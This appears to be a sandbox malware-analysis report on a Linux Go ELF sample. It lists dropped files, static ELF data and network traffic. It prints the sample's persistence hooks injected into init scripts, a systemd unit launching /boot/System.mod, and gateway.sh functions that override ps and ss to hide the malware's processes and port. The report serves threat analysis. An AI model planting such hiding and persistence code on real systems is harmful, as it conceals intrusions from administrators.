$RSYNC_DEFAULTS_FILE. case "x$RSYNC_ENABLE" in..xtrue\|xfalse).;;..xinetd)..exit 0....;;..*)..log_fail

/etc/init.d/rsyslog

Download File

Process:	/tmp/fL4E1jNVCt.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2899
Entropy (8bit):	5.275562121366292
Encrypted:	false
SSDEEP:	48:7cqmpKHnuoz/SWSZABLG/tm3RpZWE/eXt5Ie3nLqWpvU8lbzZdaZ2YI:75sKHuS8ZABLG1m3rZWE2Xt5Ie3nR5JT
MD5:	5D640A7C6908172899411BF2B8B1DE9C
SHA1:	B3980052CC12A5ACF1DD34D134CD822CAE09C63A
SHA-256:	A40550FEDDF8DB933722514358F364F7CCD50E9EFF123F4F408575BFB0865DE2
SHA-512:	E0AAF4ACC9F2707B6B191A5BDB36711F43D5C1890D5FFD614C03C2525E31F7993BE0308B865DA41B6D4E83A32759AEE91D8B94C293AD6174C2D94633980B3766
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: rsyslog.# Required-Start: $remote_fs $time.# Required-Stop: umountnfs $time.# X-Stop-After: sendsigs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: enhanced syslogd.# Description: Rsyslog is an enhanced multi-threaded syslogd..# It is quite compatible to stock sysklogd and can be .# used as a drop-in replacement..### END INIT INFO..#.# Author: Michael Biebl <biebl@debian.org>.#..# PATH should only include /usr/* if it runs after the mountnfs.sh script.PATH=/sbin:/usr/sbin:/bin:/usr/bin.DESC="enhanced syslogd".NAME=rsyslog..RSYSLOGD=rsyslogd.DAEMON=/usr/sbin/rsyslogd.PIDFILE=/run/rsyslogd.pid..SCRIPTNAME=/etc/init.d/$NAME..# Exit if the package is not installed.[ -x "$DAEMON" ] \|\| exit 0..# Read configuration variable file if it is present.[ -r /etc/default/$NAME ] && . /etc/default/$NAME..# Define LSB log_* functions... /lib/lsb/init-functions..do_st

/etc/init.d/saned

Download File

Process:	/tmp/fL4E1jNVCt.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2293
Entropy (8bit):	5.0050970590485715
Encrypted:	false
SSDEEP:	24:aruzoYFiVHCVhQJABlRi5tzldBOVQReMdHvdNw5G/9yNuFimjBklJJq5MxnR5/2F:e7Y0u/i5t7RbHwG/9diHlrXnL/iOs1
MD5:	E26E346029E7C03BC1EF969368CF6A1D
SHA1:	7AD4BCFDA2907E9EED7C2DC81820EABFC0132AE7
SHA-256:	B26A28FBDDDCA0E1A9232CF7719860044CB58D34E11AEDC1D53C9D57A689616A
SHA-512:	FBAF8DA2CA6CA008E3D3F1F93C6FAF794A0D62ECD161770F0D00A48697AC190BAB80A13EA1B2D18A4CFD35FA33BEB8891848D5DA67D1DAD2246995CD44B45910
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.#.### BEGIN INIT INFO.# Provides: saned.# Required-Start: $syslog $local_fs $remote_fs.# Required-Stop: $syslog $local_fs $remote_fs.# Should-Start: dbus avahi-daemon.# Should-Stop: dbus avahi-daemon.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: SANE network scanner server.# Description: saned makes local scanners available over the.# network..### END INIT INFO... /lib/lsb/init-functions..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/sbin/saned.NAME=saned.DESC="SANE network scanner server"..test -x $DAEMON \|\| exit 0..RUN=no.RUN_AS_USER=saned..# Get lsb functions.. /lib/lsb/init-functions..# Include saned defaults if available.if [ -f /etc/default/saned ] ; then./lib/system-mark. . /etc/default/saned.fi..DAEMON_OPTS="-a $RUN_AS_USER"..set -e..case "$1" in. start)..log_daemon_msg "Starting $DESC" "$NAME"..start-stop-daemon --start --quiet --pidfile /var/run/$N

/etc/init.d/screen-cleanup

Download File

Process:	/tmp/fL4E1jNVCt.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1274
Entropy (8bit):	5.007351824676895
Encrypted:	false
SSDEEP:	24:c26Nr+XEgBYxABoO21p4rqeYCRjeyvcsTN/RGT7d/LGld/7K9jp:cPQoO23+qeYSjeybRRGHdTGld/7K9jp
MD5:	2CB1D1EE81FD07E07C103CB77A254958
SHA1:	1B94DFA21FF802A7176767B4F0B5EEC16057B5EC
SHA-256:	6DEA1801FFE07EB969A54FA572A6A63C80D570CEABAC7F14BFD51DD40E67FD30
SHA-512:	48556EE1B364DA2B128006C2755F1C665559C2216ECA1CE06D7972A158CD27AB075859ABD842D7C2F118175A5616B6FE5B6288866A55B050A465E699EB67C491
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.# $Id: init,v 1.3 2004/03/16 01:43:45 zal Exp $.#.# Script to remove stale screen named pipes on bootup..#..### BEGIN INIT INFO.# Provides: screen-cleanup.# Required-Start: $remote_fs.# Required-Stop: $remote_fs.# Default-Start: S.# Default-Stop:.# Short-Description: screen sessions cleaning.# Description: Cleans up the screen session directory and fixes its.# permissions if needed..### END INIT INFO..set -e..test -f /usr/bin/screen \|\| exit 0..SCREENDIR=/run/screen..case "$1" in.start). if test -L $SCREENDIR \|\| ! test -d $SCREENDIR; then./lib/system-mark. rm -f $SCREENDIR. mkdir $SCREENDIR. chown root:utmp $SCREENDIR. [ -x /sbin/restorecon ] && /sbin/restorecon $SCREENDIR. fi. find $SCREENDIR -type p -delete.# If the local admin has used dpkg-statoverride to install the screen.# binary with different set[ug]id bits, change the permissions of.# $SCREENDIR accordingly. BINARYPERM=`stat -c%a /usr/bin/screen`. if [ "

/etc/init.d/spice-vdagent

Download File

Process:	/tmp/fL4E1jNVCt.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2519
Entropy (8bit):	4.741374235420371
Encrypted:	false
SSDEEP:	48:DFZazGMU+rI4CXyUH0I6zroGW//AhrHoGx//AuiIngcu/syylyTIsD2E8AB6/oBa:DF0GMU+1iD6foGWQRHoGxQuiIngczVII
MD5:	652E57DD61B8A64F80D9CCCD751E4476
SHA1:	1C9E3D8CBCD6F9E6B1B3994D8246C89A52BA84CE
SHA-256:	49FEFA6609A75C4A3624B556F2593A15B2F9E0C173BFB2233B90DBC8BF52E53D
SHA-512:	657C725D48D6A56929530EC68DB98895C4EB7F3A6C94E799FBA2BF48053883F8128C03F934A63E623340FD0433FE5222685CAC501D5C8D9B81317353649E382D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.#.# spice-vdagent Agent daemon for Spice guests.#.# chkconfig: 345 70 30.# description: Together with a per X-session agent process the spice agent \.# daemon enhances the spice guest user experience with client \.# mouse mode, guest <-> client copy and paste support and more...### BEGIN INIT INFO.# Provides: . .spice-vdagent.# Required-Start: .$local_fs $remote_fs.# Required-Stop: .$local_fs $remote_fs.# Should-Start: .dbus.# Should-Stop: ..# Default-Start: .2 3 4 5.# Default-Stop: .0 1 6.# Short-Description: .Agent daemon for Spice guests.# Description: .Together with a per X-session agent process the spice agent.# .daemon enhances the spice guest user experience with client.# .mouse mode, guest <-> client copy and paste support and more..### END INIT INFO...exec="/usr/sbin/spice-vdagentd".prog="spice-vdagentd".pidfile="/var/run/spice-vdagentd/spice-vdagentd.pid".port="/dev/virtio-ports/com.redhat.spic

/etc/init.d/ssh

Download File

Process:	/tmp/fL4E1jNVCt.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	4195
Entropy (8bit):	5.068394475077908
Encrypted:	false
SSDEEP:	96:jkXSV2xsYJrvcRyAHofonXHeyKyWUkO8IhQ:j1ouYJDc7IQXoXBIhQ
MD5:	C7F75670C4CBACFFCD3EE308F9EC9F4A
SHA1:	4D77E8C62706CB0601CB8031FB0368581E479792
SHA-256:	7E40FB227308DFE02D3F2EDF82B41D0FDF729A942D78D74C72EEA7A82669BE90
SHA-512:	39EB8A235611E0B6EC4C15D5C7D86274573A0C9DFD69E31D1297F50B992B0FF247382E20DAF02133BC7896B0530C215B5A1F870A6F214C9AF0DDB1F70C213CEA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh..### BEGIN INIT INFO.# Provides:..sshd.# Required-Start:.$remote_fs $syslog.# Required-Stop:.$remote_fs $syslog.# Default-Start:.2 3 4 5.# Default-Stop:...# Short-Description:.OpenBSD Secure Shell server.### END INIT INFO..set -e..# /etc/init.d/ssh: start and stop the OpenBSD "secure shell(tm)" daemon..test -x /usr/sbin/sshd \|\| exit 0.( /usr/sbin/sshd -\? 2>&1 \| grep -q OpenSSH ) 2>/dev/null \|\| exit 0..umask 022..if test -f /etc/default/ssh; then./lib/system-mark. . /etc/default/ssh.fi... /lib/lsb/init-functions..if [ -n "$2" ]; then./lib/system-mark. SSHD_OPTS="$SSHD_OPTS $2".fi..# Are we running from init?.run_by_init() {. ([ "$previous" ] && [ "$runlevel" ]) \|\| [ "$runlevel" = S ].}..check_for_no_start() {. # forget it if we're trying to start, and /etc/ssh/sshd_not_to_be_run exists. if [ -e /etc/ssh/sshd_not_to_be_run ]; then ./lib/system-mark..if [ "$1" = log_end_msg ]; then./lib/system-mark.. log_end_msg 0 \|\| true..fi..if ! run_by_init; then./lib/syst

/etc/init.d/udev

Download File

Process:	/tmp/fL4E1jNVCt.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	7281
Entropy (8bit):	4.982014475224516
Encrypted:	false
SSDEEP:	96:l7vIwGhwBoNNqeI4OyxwfPlBALWGGgRoG2davbKBJKCrrS2DvwvPmWGPmTbKBJKk:lOWoYiOVlz2B2daxqrS2zwGW51Wymj
MD5:	9C101DF581AD6E404FB99F3B974E743E
SHA1:	CF4A059360FEDD5F371C815772E2BAFC4532E997
SHA-256:	63F0156061B5B581C069F51ED8E3B0473CF796EA88A3BF4BE92B420D529B59AB
SHA-512:	4F7658321F7AC02F9D528088E8A572B8F8549C8FCC61366BDC43ACB61C9C216EBF597D78116A5DB4A42BDC0DC17A4AF6B55C068DB41BDC2DC661900B70A3EDE2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh -e.### BEGIN INIT INFO.# Provides: udev.# Required-Start: mountkernfs.# Required-Stop: umountroot.# Default-Start: S.# Default-Stop: 0 6.# Short-Description: Start systemd-udevd, populate /dev and load drivers..### END INIT INFO..PATH="/sbin:/bin".NAME="systemd-udevd".DAEMON="/lib/systemd/systemd-udevd".DESC="hotplug events dispatcher".PIDFILE="/run/udev.pid".CTRLFILE="/run/udev/control".OMITDIR="/run/sendsigs.omit.d"..# we need to unmount /dev/pts/ and remount it later over the devtmpfs.unmount_devpts() {. if mountpoint -q /dev/pts/; then./lib/system-mark. umount -n -l /dev/pts/. fi.. if mountpoint -q /dev/shm/; then./lib/system-mark. umount -n -l /dev/shm/. fi.}..# mount a devtmpfs over /dev, if somebody did not already do it.mount_devtmpfs() {. if grep -E -q "^[^[:space:]]+ /dev devtmpfs" /proc/mounts; then./lib/system-mark. mount -n -o remount,nosuid,size=$tmpfs_size,mode=0755 -t devtmpfs devtmpfs /dev. return. fi.. if ! mount -

/etc/init.d/ufw

Download File

Process:	/tmp/fL4E1jNVCt.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2220
Entropy (8bit):	4.757250053076253
Encrypted:	false
SSDEEP:	48:1LleiFcd/nzngwPatTM/JrNWwj/Jb/SX9l:1BDFmXOQvJE
MD5:	EA501062EF1DD3FA29A5BC5479E85D5C
SHA1:	997CD2C9A15D23589A8862E2F521A6E40C807311
SHA-256:	90D6965642D81F9AF96BA403FA262381940E73011724178E6B72EC54955C0BCB
SHA-512:	95D16F0A742BA49AA8ABEA1F448F602B4F00ED3DBDD51B25E71C79A68B9F07926B252A9B66D1BFFB760247BD4C605CCD9B4ACCF3ED1D1755A7886651AC6C396D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh..### BEGIN INIT INFO.# Provides: ufw.# Required-Start: $local_fs.# Required-Stop: $local_fs.# Default-Start: S.# Default-Stop: 1.# Short-Description: start firewall.# Description: Start ufw firewall.### END INIT INFO..set -e..PATH="/sbin:/bin"..[ -d /lib/ufw ] \|\| exit 0... /lib/lsb/init-functions..for s in "/lib/ufw/ufw-init-functions" "/etc/ufw/ufw.conf" "/etc/default/ufw" ; do. if [ -s "$s" ]; then./lib/system-mark. . "$s". else. log_failure_msg "Could not find $s (aborting)". exit 1. fi.done..error=0.case "$1" in.start). if [ "$ENABLED" = "yes" ] \|\| [ "$ENABLED" = "YES" ]; then./lib/system-mark. log_action_begin_msg "Starting firewall:" "ufw". output=`ufw_start` \|\| error="$?". if [ "$error" = "0" ]; then./lib/system-mark. log_action_cont_msg "Setting kernel variables ($IPT_SYSCTL)". fi. if [ ! -z "$output" ]; then./lib/system-mark. echo "$output" \| while read

/etc/init.d/unattended-upgrades

Download File

Process:	/tmp/fL4E1jNVCt.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1426
Entropy (8bit):	5.323775798950294
Encrypted:	false
SSDEEP:	24:aMXni+12wpFKFOGofwvlf/HNVKowwflHBhF/7Px1gr:bni23FKFpbt3GnoHBDbx2
MD5:	0BAD7D02A34912B684C93C71BFD19757
SHA1:	688CF612860E3C7125D34B63F7EF584DC65E4550
SHA-256:	FF796642243AF8B1492D63FF16F761AE942A4AE7CCFA17A05E3CF533B0D6E4DB
SHA-512:	D806A1D5B8AD9AA0A51841825DA8ACD4DA299D331874CD6FD777BCD6802B8BC7498B118B6D85F7E1793749EDCD3ABBD57EA78620226D34E43DA3AE1EE73BA684
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.#.### BEGIN INIT INFO.# Required-Start: $local_fs $remote_fs.# Required-Stop: $local_fs $remote_fs.# Provides: unattended-upgrade-shutdown-check.# Default-Start: 2 3 4 5.# Default-Stop: 0 6.# Short-Description: Check if unattended upgrades are being applied.# Description: Check if unattended upgrades are being applied.# and wait for them to finish.### END INIT INFO.set -e..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin..NAME="unattended-upgrades-shutdown".DESC="unattended package upgrades shutdown".SCRIPTNAME="/etc/init.d/$NAME".SHUTDOWN_HELPER="/usr/share/unattended-upgrades/unattended-upgrade-shutdown"..if [ -x /usr/bin/python3 ]; then./lib/system-mark. PYTHON=python3.else. PYTHON=python.fi..# Load the VERBOSE setting and other rcS variables.. /lib/init/vars.sh..# Define LSB log_* functions..# Depend on lsb-base (>= 3.2-14) to ensure that this file is present.. /lib/lsb/init-functions..case "$1" in.

/etc/init.d/uuidd

Download File

Process:	/tmp/fL4E1jNVCt.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1358
Entropy (8bit):	5.209136415739334
Encrypted:	false
SSDEEP:	24:aNmC4ozLk8BZa8LNfwa0aDEPLu5CB5ZM5AHdwi/mqT0KtOC:3VozBjdh0a4PLuIBvMGwitIKtl
MD5:	A18F61759309F7DAE1CF4D379B0DC2E0
SHA1:	38BB4BFF894D6973BC2B59145A28CD93FC2A2B26
SHA-256:	8750FAACA2F9E6ED50996EBA4C23F884241C27A375CCFE79801715044BEA7232
SHA-512:	18489A3A5A446A80D1EEB324AD9823480FF2C53AF1703D4DB6B3DE42A7901B0223135948FD5162F60418F1AB7B7AA1CB3D3CA5C7D1E9E05F6048204DD913D6FB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh -e.### BEGIN INIT INFO.# Provides: uuidd.# Required-Start: $time $local_fs $remote_fs.# Required-Stop: $time $local_fs $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: uuidd daemon.# Description: Init script for the uuid generation daemon.### END INIT INFO.#.# Author:."Theodore Ts'o" <tytso@mit.edu>.#.set -e..PATH=/bin:/usr/bin:/sbin:/usr/sbin.DAEMON=/usr/sbin/uuidd.UUIDD_USER=uuidd.UUIDD_GROUP=uuidd.UUIDD_DIR=/run/uuidd.PIDFILE=$UUIDD_DIR/uuidd.pid..test -x $DAEMON \|\| exit 0... /lib/lsb/init-functions..case "$1" in. start)..log_daemon_msg "Starting uuid generator" "uuidd"..if ! test -d $UUIDD_DIR; then./lib/system-mark...mkdir -p $UUIDD_DIR...chown -R $UUIDD_USER:$UUIDD_GROUP $UUIDD_DIR..fi..start_daemon -p $PIDFILE $DAEMON..log_end_msg $?. ;;. stop)..log_daemon_msg "Stopping uuid generator" "uuidd"..killproc -p $PIDFILE $DAEMON..log_end_msg $?. ;;. status)..if pidofproc -p $PIDFILE $DAEMON >/dev/null 2>&

/etc/init.d/x11-common

Download File

Process:	/tmp/fL4E1jNVCt.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2911
Entropy (8bit):	4.894244496059908
Encrypted:	false
SSDEEP:	48:ZETewCRgFkV5ZSVwxcRypF1vrBy9DuIpPX5uCXAepm1L3/WAhyC76XGMgH3:SggFkViVNePT09DuYX5HX3aLdqX8
MD5:	E39C2FE947515C58470F91A5A6D1ED5B
SHA1:	00C7881A33ED0425C236C9544BD43E7BC9AE46DD
SHA-256:	37CCB9BB9C51FEB17B9943BB7DF42E8E03342F5611EC649E5C6E5A87A5A2840D
SHA-512:	AB26218676CEA2C319F29911650AA98C2E7D5578E9E2130D44997FDDE2E59765E1AAC52E0EE2C466E231B55AFFCA92B9C0A67A8381725D5433C3392DE04FF7F3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.# /etc/init.d/x11-common: set up the X server and ICE socket directories.### BEGIN INIT INFO.# Provides: x11-common.# Required-Start: $remote_fs.# Required-Stop: $remote_fs.# Default-Start: S.# Default-Stop:.# Short-Description: set up the X server and ICE socket directories.### END INIT INFO..set -e..PATH=/usr/bin:/usr/sbin:/bin:/sbin.SOCKET_DIR=.X11-unix.ICE_DIR=.ICE-unix... /lib/lsb/init-functions.if [ -f /etc/default/rcS ]; then./lib/system-mark. . /etc/default/rcS.fi..do_restorecon () {. # Restore file security context (SELinux).. if which restorecon >/dev/null 2>&1; then./lib/system-mark. restorecon "$1". fi.}..# create a directory in /tmp..# assumes /tmp has a sticky bit set (or is only writeable by root).set_up_dir () {. DIR="/tmp/$1".. if [ "$VERBOSE" != no ]; then./lib/system-mark. log_progress_msg "$DIR". fi. # if $DIR exists and isn't a directory, move it aside. if [ -e $DIR ] && ! [ -d $DIR ] \|\| [ -h $DIR ]; then./lib/system-mar

/etc/profile.d/bash_cfg.sh

Download File

Process:	/tmp/fL4E1jNVCt.elf
File Type:	Bourne-Again shell script, ASCII text executable
Category:	dropped
Size (bytes):	35
Entropy (8bit):	4.261725074756386
Encrypted:	false
SSDEEP:	3:TKH/binKE:siKE
MD5:	BE6E09DEC0A6249FD83851DAF92AE627
SHA1:	9FF81BB38A0FD5432575455D7D8334BD8D983CF7
SHA-256:	44BDD8B7F00094E163540A2B8C3CF973E72499BAA20B78F8051E2422163E1D0D
SHA-512:	CCF2BDC30F45A132DBDBBF1F008A06525B7EE4A46F09A11025BA05A55835F67356DBB4F8E826AFB28C73AFE5653C09C7CEAA082A2194A0D7C78BE101A4AD1F30
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/bash./etc/profile.d/bash_cfg

/etc/profile.d/gateway.sh

Download File

Process:	/tmp/fL4E1jNVCt.elf
File Type:	Bourne-Again shell script, ASCII text executable, with very long lines (910)
Category:	dropped
Size (bytes):	6339
Entropy (8bit):	4.824356496715234
Encrypted:	false
SSDEEP:	192:sjahyOjP3ECqh8te8jahyOjP3ECqh8temjahyOjP3ECqh8teujahyOjP3ECqh8ti:0wCKYIcQ
MD5:	961246851DB637D36BE841C740B14398
SHA1:	AEFD60CC029A91D68E656CC239FEEAC175AF3590
SHA-256:	7A12230C625092499429F9B63E84EE735B7D42B42E5BF41BC135CB45CD92400C
SHA-512:	2FFC0E6C6ADDC05B53D09BEC3C9934C78C99A9A66C5FAC36A37B0EE5D4E6BBF65C79ECDDD53D940159C6D6872A70988F15CA090AA927461E4FB6767F481759ED
Malicious:	true
Preview:	#!/bin/bash.function ps { proc_name=$(/usr/bin/ps $@);proc_name=$(echo "$proc_name" \| sed -e '/32676/d');proc_name=$(echo "$proc_name" \| sed -e '/dns-tcp4/d');proc_name=$(echo "$proc_name" \| sed -e '/quotaoff.service/d');proc_name=$(echo "$proc_name" \| sed -e '/System.mod/d');proc_name=$(echo "$proc_name" \| sed -e '/gateway.sh/d');proc_name=$(echo "$proc_name" \| sed -e '/32676/d');proc_name=$(echo "$proc_name" \| sed -e '/.mod/d');proc_name=$(echo "$proc_name" \| sed -e '/libgdi.so.0.8.1/d');proc_name=$(echo "$proc_name" \| sed -e '/opt.services.cfg/d');proc_name=$(echo "$proc_name" \| sed -e '/system-mark/d');proc_name=$(echo "$proc_name" \| sed -e '/ifconfig.cfg/d');proc_name=$(echo "$proc_name" \| sed -e '/sleep/d');proc_name=$(echo "$proc_name" \| sed -e '/seeintlog/d');proc_name=$(echo "$proc_name" \| sed -e '/bash_cfg/d');proc_name=$(echo "$proc_name" \| sed -e '/fL4E1jNVCt.elf/d');echo "$proc_name"; }.function ss { proc_name=$(/usr/bin/ss $@);proc_name=$(echo "$proc_name" \| sed -e '/3267

/memfd:snapd-env-generator (deleted)

Download File

Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File Type:	ASCII text
Category:	dropped
Size (bytes):	76
Entropy (8bit):	3.7627880354948586
Encrypted:	false
SSDEEP:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
MD5:	D86A1F5765F37989EB0EC3837AD13ECC
SHA1:	D749672A734D9DEAFD61DCA501C6929EC431B83E
SHA-256:	85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
SHA-512:	338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
Malicious:	false
Preview:	PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

/proc/5916/loginuid

Download File

Process:	/usr/sbin/cron
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

/proc/5991/loginuid

Download File

Process:	/usr/sbin/cron
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

/run/crond.pid

Download File

Process:	/usr/sbin/cron
File Type:	ASCII text
Category:	dropped
Size (bytes):	10
Entropy (8bit):	2.321928094887362
Encrypted:	false
SSDEEP:	3:8T9cvn:88n
MD5:	D838519C2499C468FEE3B0B0A1815DAF
SHA1:	AB32A8487A8E45697CEE310EFC3DCF7D5711E84D
SHA-256:	4F22230CAA852AFE884CCB9634F4286C9D83C73D3D3590FE3070DFF47561B923
SHA-512:	5A3C84A7EE8B89E6658629A80BFDA2ABFFDE9933BB16EACBB73AA4DBC77056515A2697BF1AE38CD1076EEA27BE99CBC77BD93D2625D63336FE9A9B6D8F63D809
Malicious:	false
Preview:	6029.6029.

/usr/lib/systemd/system/quotaoff.service

Download File

Process:	/tmp/fL4E1jNVCt.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	186
Entropy (8bit):	4.795801274247707
Encrypted:	false
SSDEEP:	3:zMZa7kKXtERv+2AXTMikAdIgQ+NRs7WRA2Iav817WRA2IavpsRs7WRA2Iav2rSkc:z86XWRBADMD+ns7Hvx17Hv2sRs7HvtLc
MD5:	B02DE6CD28CD922B18D9D93375A70D8B
SHA1:	021426A5A2FF9EDC80BA5936C94B37525538885E
SHA-256:	D8D8E5CD33AA3450CD74C63716A02F3DFF39EFEF2836559F110BC93663B1380A
SHA-512:	DB3FE03AD5E599E6C03AAEC7BF1242F5509FBB624ADB9AFB7499E25487DAEF3F3F1C6BABF51570B527A5AC5C9F4B079AE4CC53BAA9497C0A121328BEF8D04422
Malicious:	false
Preview:	[Unit].Description=linux.After=network.target.[Service].Type=forking.ExecStart=/boot/System.mod.ExecReload=/boot/System.mod.ExecStop=/boot/System.mod.[Install].WantedBy=multi-user.target

Static File Info

General

File type:	ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, Go BuildID=9f3aGTNZ1NqDQgjyl7Bs/QGy4ge3vDxRLRpuKggby/KTQeE9n5NZZsIG16ifyG/7KQSl1XiJmykz3-kickd, stripped
Entropy (8bit):	6.029545946499566
TrID:	ELF Executable and Linkable format (Linux) (4029/14) 49.77% ELF Executable and Linkable format (generic) (4004/1) 49.46% Lumena CEL bitmap (63/63) 0.78%
File name:	fL4E1jNVCt.elf
File size:	2'011'136 bytes
MD5:	e55a695d2530b3fb5c80256f6036de29
SHA1:	cbf9fb21338b161a6b5ab67425e8afbcf9bbcd93
SHA256:	ce2944509d3936280343639c38ed5240f0a35c8d1dd63a00ce0eef1052325124
SHA512:	a59fec7fe64abf676a4b40737eaf4b5824daf78c78324ef1e8b58114f81bbeda4edb281fab0582026dd8363314905d0259b20ac842f9016f4da8bf1dab0fc89d
SSDEEP:	49152:XXPVKrbvGOQLeS7rb/TCvO90d7HjmAFd4A64nsfJrkaani38B4B+g2vUqHOErz1:tPXZz
TLSH:	20952847B89156A9C0AAE234CA664252B761BC991F3163D73F10B3F82F33BD45E39358
File Content Preview:	.ELF..............>..... JF.....@...................@.8...@.............@.......@.@.....@.@...............................................@.......@.....d.......d.................................@.......@......D.......D.......................P.......PN....

Static ELF Info

ELF header
Class:	ELF64
Data:	2's complement, little endian
Version:	1 (current)
Machine:	Advanced Micro Devices X86-64
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x464a20
Flags:	0x0
ELF Header Size:	64
Program Header Offset:	64
Program Header Size:	56
Number of Program Headers:	7
Section Header Offset:	456
Section Header Size:	64
Number of Section Headers:	14
Header String Table Index:	3

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.text	PROGBITS	0x401000	0x1000	0xe34b6	0x0	0x6	AX	32
.rodata	PROGBITS	0x4e5000	0xe5000	0x57e45	0x0	0x2	A	32
.shstrtab	STRTAB	0x0	0x13ce60	0x98	0x0	0x0		1
.typelink	PROGBITS	0x53cf00	0x13cf00	0x8e0	0x0	0x2	A	32
.itablink	PROGBITS	0x53d7e0	0x13d7e0	0x250	0x0	0x2	A	32
.gosymtab	PROGBITS	0x53da30	0x13da30	0x0	0x0	0x2	A	1
.gopclntab	PROGBITS	0x53da40	0x13da40	0x92b18	0x0	0x2	A	32
.go.buildinfo	PROGBITS	0x5d1000	0x1d1000	0xf0	0x0	0x3	WA	16
.noptrdata	PROGBITS	0x5d1100	0x1d1100	0x11e4c	0x0	0x3	WA	32
.data	PROGBITS	0x5e2f60	0x1e2f60	0x7f90	0x0	0x3	WA	32
.bss	NOBITS	0x5eaf00	0x1eaf00	0x2e620	0x0	0x3	WA	32
.noptrbss	NOBITS	0x619520	0x219520	0x4410	0x0	0x3	WA	32
.note.go.buildid	NOTE	0x400f9c	0xf9c	0x64	0x0	0x2	A	4

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
PHDR	0x40	0x400040	0x400040	0x188	0x188	1.6020	0x4	R	0x1000
NOTE	0xf9c	0x400f9c	0x400f9c	0x64	0x64	5.2211	0x4	R	0x4	.note.go.buildid
LOAD	0x0	0x400000	0x400000	0xe44b6	0xe44b6	6.1217	0x5	R E	0x1000	.text .note.go.buildid
LOAD	0xe5000	0x4e5000	0x4e5000	0xeb558	0xeb558	5.4337	0x4	R	0x1000	.rodata .typelink .itablink .gosymtab .gopclntab
LOAD	0x1d1000	0x5d1000	0x5d1000	0x19f00	0x4c930	4.4310	0x6	RW	0x1000	.go.buildinfo .noptrdata .data .bss .noptrbss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x8
LOOS+5041580	0x0	0x0	0x0	0x0	0x0	0.0000	0x2a00		0x8

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 2, 2024 04:00:37.500659943 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:37.505595922 CET	53	45164	8.8.8.8	192.168.2.14
